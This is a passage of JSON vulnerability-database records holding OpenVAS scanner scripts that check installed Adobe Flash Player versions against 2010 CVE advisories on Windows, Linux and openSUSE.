linux-f8-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f10-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.1r102\")<0) {\n txt += 'Package linux-f10-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.", "modified": 
"2019-05-17T00:00:00", "published": "2010-11-12T00:00:00", "id": "OPENVAS:1361412562310801629", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801629", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801629\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2010-11-12 15:34:28 +0100 (Fri, 12 Nov 2010)\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\",\n \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\",\n \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\",\n \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", 
\"CVE-2010-3652\");\n script_bugtraq_id(44669);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/41917\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to execute arbitrary code or cause\n a denial of service via unknown vectors.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 10.1.85.3 and prior on Windows\");\n script_tag(name:\"insight\", value:\"The flaws are caused by unspecified errors, that can be exploited to execute\n arbitrary code or cause a denial of service.\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version 10.1.102.64 or later\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/downloads/\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version:vers, test_version:\"10\", test_version2:\"10.1.85.3\" ) ||\n version_is_less( version:vers, test_version:\"9.0.289.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, 
fixed_version:\"10.1.102.64\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:40:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Adobe Flash Player is installed on this host and is prone to\n multiple unspecified vulnerabilities.", "modified": "2018-12-04T00:00:00", "published": "2010-11-12T00:00:00", "id": "OPENVAS:1361412562310801630", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801630", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_mult_vuln_nov10_lin.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Adobe Flash Player Multiple Vulnerabilities (Linux)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801630\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-12 15:34:28 +0100 (Fri, 12 Nov 2010)\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\",\n \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\",\n \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\",\n \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\");\n script_bugtraq_id(44669);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities (Linux)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/41917\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let attackers to execute arbitrary code or cause\n a denial of service via unknown vectors.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 10.1.85.3 and prior on Linux\");\n script_tag(name:\"insight\", value:\"The flaws are caused by unspecified 
errors, that can be exploited to execute\n arbitrary code or cause a denial of service.\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version 10.1.102.64 or later\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/downloads/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nflashVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nflashVer = ereg_replace(pattern:\",\", string:flashVer, replace: \".\");\n\nif(flashVer)\n{\n if(version_in_range(version:flashVer, test_version:\"10\", test_version2:\"10.1.85.3\")||\n version_is_less(version:flashVer, test_version:\"9.0.289.0\")) {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Adobe Flash Player is installed on this host and is prone to\n multiple unspecified vulnerabilities.", "modified": "2017-02-10T00:00:00", "published": "2010-11-12T00:00:00", "id": "OPENVAS:801630", "href": "http://plugins.openvas.org/nasl.php?oid=801630", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_mult_vuln_nov10_lin.nasl 5263 2017-02-10 13:45:51Z teissa $\n#\n# Adobe Flash 
Player Multiple Vulnerabilities (Linux)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let attackers to execute arbitrary code or cause\n a denial of service via unknown vectors.\n Impact Level: Application/System\";\ntag_affected = \"Adobe Flash Player version 10.1.85.3 and prior on Linux\";\ntag_insight = \"The flaws are caused by unspecified errors, that can be exploited to execute\n arbitrary code or cause a denial of service.\";\ntag_solution = \"Upgrade to Adobe Flash Player version 10.1.102.64 or later\n For details refer, http://www.adobe.com/downloads/\";\ntag_summary = \"This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.\";\n\nif(description)\n{\n script_id(801630);\n script_version(\"$Revision: 5263 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-12 15:34:28 +0100 (Fri, 12 Nov 2010)\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\",\n \"CVE-2010-3640\", 
\"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\",\n \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\",\n \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\");\n script_bugtraq_id(44669);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities (Linux)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/41917\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_require_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Check for Adobe Flash Player version\nflashVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nflashVer = ereg_replace(pattern:\",\", string:flashVer, replace: \".\");\n\nif(flashVer)\n{\n if(version_in_range(version:flashVer, test_version:\"10\", test_version2:\"10.1.85.3\")||\n version_is_less(version:flashVer, test_version:\"9.0.289.0\")) {\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:18:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", 
"CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.", "modified": "2017-12-19T00:00:00", "published": "2010-11-12T00:00:00", "id": "OPENVAS:801629", "href": "http://plugins.openvas.org/nasl.php?oid=801629", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_mult_vuln_nov10_win.nasl 8178 2017-12-19 13:42:38Z cfischer $\n#\n# Adobe Flash Player Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\ntag_impact = \"Successful exploitation will let attackers to execute arbitrary code or cause\n a denial of service via unknown vectors.\n Impact Level: Application/System\";\ntag_affected = \"Adobe Flash Player version 10.1.85.3 and prior on Windows\";\ntag_insight = \"The flaws are caused by unspecified errors, that can be exploited to execute\n arbitrary code or cause a denial of service.\";\ntag_solution = \"Upgrade to Adobe Flash Player version 10.1.102.64 or later\n For details refer, http://www.adobe.com/downloads/\";\ntag_summary = \"This host is installed with Adobe Flash Player and is prone to\n multiple unspecified vulnerabilities.\";\n\nif(description)\n{\n script_id(801629);\n script_version(\"$Revision: 8178 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 14:42:38 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-12 15:34:28 +0100 (Fri, 12 Nov 2010)\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\",\n \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\",\n \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\",\n \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\");\n script_bugtraq_id(44669);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/41917\");\n script_xref(name : \"URL\" , 
value : \"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version:vers, test_version:\"10\", test_version2:\"10.1.85.3\" ) ||\n version_is_less( version:vers, test_version:\"9.0.289.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"10.1.102.64\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:04:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Check for the Version of flash-player", "modified": "2018-01-04T00:00:00", "published": "2010-11-16T00:00:00", "id": "OPENVAS:1361412562310850149", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310850149", "type": "openvas", "title": "SuSE Update for flash-player SUSE-SA:2010:055", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for flash-player SUSE-SA:2010:055\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Adobe Flash Player was updated to version 10.1.102.64 to fix\n a critical security issue.\n\n Adobe has posted advisories on their website:\n http://www.adobe.com/support/security/advisories/apsa10-05.html\n and also\n http://www.adobe.com/support/security/advisories/apsa10-26.html\n\n The following CVE entries were listed as fixed:\n CVE-2010-3639\n CVE-2010-3643\n CVE-2010-3647\n CVE-2010-3651\n CVE-2010-3976\n\n SUSE Linux Enterprise Desktop 11 GA and Service Pack 1, and openSUSE\n 11.1-11.3 have received updates.\n\n There currently is no updated version available for the Flash Player\n version 9 on SUSE Linux Enterprise Desktop 10 Service Pack 3 so far.\n It will be released as soon as it is available.\";\ntag_solution = \"Please 
Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"flash-player on openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850149\");\n script_version(\"$Revision: 8287 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 08:28:11 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-055\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n script_name(\"SuSE Update for flash-player SUSE-SA:2010:055\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.102.64~0.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.102.64~0.2.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-15T11:57:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Check for the Version of flash-player", "modified": "2017-12-15T00:00:00", "published": "2010-11-16T00:00:00", "id": "OPENVAS:850149", "href": "http://plugins.openvas.org/nasl.php?oid=850149", "type": "openvas", "title": "SuSE Update for flash-player SUSE-SA:2010:055", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for flash-player SUSE-SA:2010:055\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Adobe Flash Player was updated to version 10.1.102.64 to fix\n a critical security issue.\n\n Adobe has posted advisories on their website:\n http://www.adobe.com/support/security/advisories/apsa10-05.html\n and also\n http://www.adobe.com/support/security/advisories/apsa10-26.html\n\n The following CVE entries were listed as fixed:\n CVE-2010-3639\n CVE-2010-3643\n CVE-2010-3647\n CVE-2010-3651\n CVE-2010-3976\n\n SUSE Linux Enterprise Desktop 11 GA and Service Pack 1, and openSUSE\n 11.1-11.3 have received updates.\n\n There currently is no updated version available for the Flash Player\n version 9 on SUSE Linux Enterprise Desktop 10 Service Pack 3 so far.\n It will be released as soon as it is available.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"flash-player on openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_id(850149);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-055\");\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", 
\"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n script_name(\"SuSE Update for flash-player SUSE-SA:2010:055\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.102.64~0.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.1.102.64~0.2.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-2160", "CVE-2010-3640", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", 
